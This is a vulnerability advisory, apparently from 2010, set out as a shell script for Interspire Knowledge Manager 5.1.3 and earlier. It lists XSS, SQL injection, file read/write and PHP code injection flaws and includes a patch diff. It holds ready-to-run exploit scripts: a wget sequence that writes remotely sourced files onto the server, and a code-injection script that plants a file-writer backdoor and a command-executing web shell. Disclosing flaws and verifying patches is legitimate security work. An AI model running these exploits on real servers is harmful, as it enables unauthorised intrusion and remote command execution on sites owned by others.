#!/bin/sh # # - Interspire Knowledge Manager - # # ====================================================================== # Table of Contents # # Affected Software....................................................1 # Severity.............................................................2 # Vendor's Description of Software.....................................3 # Description of Vulnerability.........................................4 # Solution.............................................................5 # Time Table...........................................................6 # Credits..............................................................7 # Sample Exploit.....................................................8 # # ====================================================================== # 1) Affected Software # # * Interspire Knowledgebase Manager <= 5.1.3 # # ====================================================================== # 2) Severity # # Rating: Critical # Impact: Web server compromise, remote code injection # Where: Remote # # ====================================================================== # 3) Vendor's Description of Software # # "Knowledge Management Software to Locate, Capture and Share Information With Your Team. # Interspire Knowledge Manager allows you to share information from your website or Intranet with # an enterprise-grade knowledge base, reducing customer support, improving staff productivity and # eliminating time wasted searching for information across disparate systems such as shared # folders and paper documents. # Share knowledge easily & securely # Already in use by over 2,000 small businesses, universities, non-profits and enterprise organizations" # # Product Link: # http://www.interspire.com/knowledgemanager/ # # ====================================================================== # 4) Description of Vulnerability # # Multiple vulnerabilities exist in the software with a range of impact. # Known vulnerabilities include: # # Information Disclosure: # Information disclosure of the server's $_SERVER['DOCUMENT_ROOT'] # admin/de/dialog/media_manager.php: view source, roots["dRoot"] = # This can be used by an attacker to determine the server's root path from a relative path, # or from a root path to a web accessible path. # - no fix available. # # Cross Site Scripting # many XSS holes exist, here is a sample transient XSS hole, many more exist: # admin/de/colormenu.php?sp=f";alert('xss');a=" # - fix: no fix available # # SQL Injection: # Nearly every query is vulnerable to SQL injection with PHP magic quotes # turned off. Input validation fails at many levels, so some SQL injection # may still be likely with magic quotes on. # - fix: turn on magic quotes # # Remote File Read: # The application blindly accepts user data, unfiltered and reads files from # the file system. # admin/de/dialog/file_manager.php?p=/file/to/read&w=1 # - fix: vendor is recommending purchasing version 5.1.3 # # Remote File Write: # The software has a "feature" that allows overwriting $_SESSION variables # with $_GET variables. Parts of the software that assume these variables # are secure, can then be exploited to write any file to the system by an # unauthenticated user, including PHP code. # example POC code: # # #!/bin/sh # echo "$0 # example: $0 http://target.com/knowledge_base ../../../ file.php http://source # if kb is installed at knowledge_base, then the file: file.php will be # created in the base application directory from the content at http://source # " # sessionUrl=$1'/admin/de/dialog/file_manager.php' # uploadUrl=$1'/admin/de/dialog/callback.snipshot.php' # wget -O r1 --save-cookies tmp.cookies --keep-session-cookies "$sessionUrl?userdocroot=$2&imgDir=&obj=1" # echo "session created, setting file name $2$3" # wget -O r2 --keep-session-cookies --load-cookies tmp.cookies "$uploadUrl?action=step1&source_image=name&save_file_as=$3" # echo "upload content from: $4 ..." # wget -O r3 --keep-session-cookies --load-cookies tmp.cookies "$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4" # echo "file created test access to the script at: $1/admin/de/dialog/$2$3"; # # - fix: vendor is recommending purchasing version 5.1.3 # # PHP code Injection: # The software has a feature that connects to Interspire to find the latest # version of the software. This is then cached in a PHP file. The version # number is taken from a get variable and written directly into a PHP file. # This allows anyone with web access to the software to upload code # and execute it remotely. # - fix: vendor has said that a fix will be available for purchase during the next release cycle. # An alternate patch is available in this advisory. # # ====================================================================== # 5) Solution # # Remote file reads, writes and code injection can be fixed by purchasing version 5.1.3 and # applying the included patch to the PHP code. The other vulnerabilities are hopefully addressed # in the next release cycle. # # file to patch: admin/remote.php # # ====================================================================== # 6) Time Table # # 1/15/2009 - Vendor notified. # 2/02/2010 - Vendor responded that vulnerability would be addressed in next software version and # no security patch would be made available to customers. # 2/03/2010 - Non-vendor patch created to solve remote code injection problem. # ====================================================================== # 7) Credits Cory Marsh # # ====================================================================== # 8) context sensitive patch diff admin/remote.php: # *** remote.orig.php 2010-02-03 08:44:19.116062114 -0000 --- remote.php 2010-02-03 08:49:22.086078275 -0000 *************** *** 28,34 **** if (isset($_REQUEST['type'])) { switch ($_REQUEST['type']) { case 'saveVersion': ! if(!isset($_REQUEST['v'])) { exit; } --- 28,34 ---- if (isset($_REQUEST['type'])) { switch ($_REQUEST['type']) { case 'saveVersion': ! if(!isset($_REQUEST['v']) || !preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) { exit; } # # ====================================================================== # 8) Sample exploit, use this to verify the patch. # # This POC example can be used to verify vulnerable software, and then verify that the patch # worked correctly. This script will modify the admin/tmp/LatestVersion.php script so that # in addition to defining the latest software version, it will also write a file to the filesystem passed # as a POST paramater "f", with the contents of POST parameter "u". It will then use this # LatestVersion.php script to create a new file /admin/incadd_set.php that echo's out the GET # parameter "cmd". After applying the supplied patch, this exploit script should no longer work # echo "usage: $0 example: $0 http://www.remotehost/help "; vulnerable="$1/admin/remote.php" compromised="$1/admin/tmp/LatestVersion.php"; echo "type=saveVersion&v=5.1.3','lastCheck'=>time());if(isset(\$_POST['f']))file_put_contents(\$_POST['f'],stripslashes(\$_POST['u']));\$a=array('" > injection.txt echo "f=../incadd_set.php&u=
 code.txt
wget --post-file=injection.txt $vulnerable > /dev/null
wget --post-file=code.txt $compromised > /dev/null
echo "code installed at: $1/admin/incadd_set.php?cmd=whoami;ls /etc"